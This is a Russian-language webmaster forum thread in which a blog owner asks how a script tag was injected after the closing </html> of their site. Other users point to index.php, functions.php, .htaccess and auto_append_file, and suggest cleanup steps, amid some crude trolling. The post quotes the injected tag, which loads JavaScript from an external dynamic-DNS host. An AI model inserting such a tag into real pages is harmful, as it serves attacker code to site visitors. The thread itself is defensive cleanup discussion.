Master-X
Форум | Новости | Статьи
Главная » Форум » Программинг, Скрипты, Софт, Сервисы » 
Тема: Где искать дырку?
цитата
21/01/13 в 18:41
 mazzzer2
На блоге появился подключаемый скрипт с вирусней (может не вирусня, конечно, но это не мое icon_smile.gif ), причем вставлен он после </html>

</html><script src="http://eetitqf.dnsalias.com/js/rsize.js"></script>

Где найти как он вставляется? В футере все чисто.
цитата
21/01/13 в 18:50
 Дартаньян
ищи по изменениям, лично я знаю 10 вариантов, из них 6 хитровыебаных.

Ну а так для начала, index.php в корне и functions.php проверь. также глянь htaccess там можно добавлять тоже, мало кто знает но встречал.
цитата
21/01/13 в 19:24
 johndoe2
Код:
php -i | grep auto_append_file
цитата
21/01/13 в 19:41
 mazzzer2
Действительно в index.php в корне было, че-то не посмотрел туда
цитата
21/01/13 в 19:56
 gewi
Нужно смотреть что в логах. И разматывать цепочку латать уязвимость и чистится.
цитата
21/01/13 в 19:58
 mazzzer2
Уметь бы еще это делать icon_smile.gif
цитата
21/01/13 в 20:41
 Дартаньян
mazzzer2: trollface.png дай фтп доступ, деловто 10 минут.
цитата
21/01/13 в 20:47
 mazzzer2
icon_smile.gif так нашел уже
остальные файлы без изменений
по фтп нельзя же логи посмотреть icon_smile.gif
цитата
21/01/13 в 20:54
 Дартаньян
mazzzer2: trollface.png удалить то удалил а как залил то не знаешь ведь.
цитата
21/01/13 в 22:16
 andreich
Дартаньян: а можно поинтересоватся, как ты с FTP доступом узнаешь как его залили ?
цитата
21/01/13 в 22:28
 Дартаньян
andreich: опять, ты гвардеец, какое тебе дело до этого? Интересно? Так по гугли! trollface.png
цитата
21/01/13 в 22:39
 andreich
да хули мне гуглить, если нормально настроен сервак, ты даже логов по FTP не сможешь посмотреть

я тебе что Грубил ? помойму ты какойто дальний родственик suomi


mazzzer2: если блог на WP обнови до последней версии, тут я бы вообще предложил радикальные меры, убивание всех файлов кроме папки /wp-content/ ну и конечно фала wp-config.php
ну полежит блог 5 минут ничего страшного
проверь права CHMOD на папки
посмотри что в папке /wp-content/uploads/ (в основном овно как раз туда попадает, так как папка в большинстве случаев имеет CHMOD 777
цитата
21/01/13 в 22:51
 Дартаньян
andreich: просто ты утомил меня facepalm.gif, на хрен мне логи? я файлики посмотрю, уверяю у меня опыт латания и администрирования этого больше чем у тебя опыта в АВМ, особенно помню про require для удаленных файлов. кстати ты когда включил allow_url_include, сапка то наверное и заработала, только для WP твой гениальный подход это смерть.

mazzzer2: также смени пасс к ftp и админки, проверь если еще один админ или редактор какой левый, есть также плагин и плагин.
цитата
21/01/13 в 23:08
 andreich
Дартаньян писал:
andreich: просто ты утомил меня

ну может быть, но как мне кажется, это ты уже утомил всех на форуме
своми мега весерами мозга

P.S. allow_url_include было там не причем
цитата
21/01/13 в 23:13
 Дартаньян
andreich писал:
мега весерами
покинь топик ты все равно в этом не шаришь.
цитата
21/01/13 в 23:22
 awm5433224455
А как вы поняли что у тс вордпрес то trollface.png
цитата
21/01/13 в 23:48
 Дартаньян
awm5433224455: 95% что вордпресс, ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя.
цитата
22/01/13 в 00:18
 awm5433224455
Дартаньян писал:
ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя.

smail101.gif да и вордпресс я из за этого не долюбливаю потому что в нем постоянно косяки и над ним нужно корпеть постоянно. А когда разрастается это все до нескольких сайтов тут совсем веселье начинается.
Даже гонки успел обновиться или червь пробежался по всем и проставил фрейма
цитата
22/01/13 в 00:30
 Дартаньян
awm5433224455: trollface.png накатаю мануал, по безопасности для WP.
цитата
22/01/13 в 00:57
 st01en
Ты сначала накатай то, что обещал icon_wink.gif
цитата
22/01/13 в 01:12
 Дартаньян
st01en: пишу, учел пожелания доброжелателей к краткому мануалу.
цитата
22/01/13 в 12:20
 awm5433224455
Дартаньян писал:
awm5433224455: trollface.png накатаю мануал, по безопасности для WP.

Тут нужно осторожно писать, по безопастности лучше не писать. Научишь переломают пол интернета за ночь smail101.gif
цитата
22/01/13 в 12:29
 andreich
awm5433224455: че он там может написать ? там все сводится к двум вещям - CHMOD правильные и правильно настроенный сервак, вот и все
цитата
22/01/13 в 13:10
 awm5433224455
скрипт кидисы всеравно сумеют нагадить своими дефейсами вида луиз сек
цитата
22/01/13 в 13:35
 Дартаньян
andreich писал:
правильно настроенный сервак
trollface.png вот ты и ответил о чем я напишу.
Стр. 1, 2  >  последняя »


Эта страница в полной версии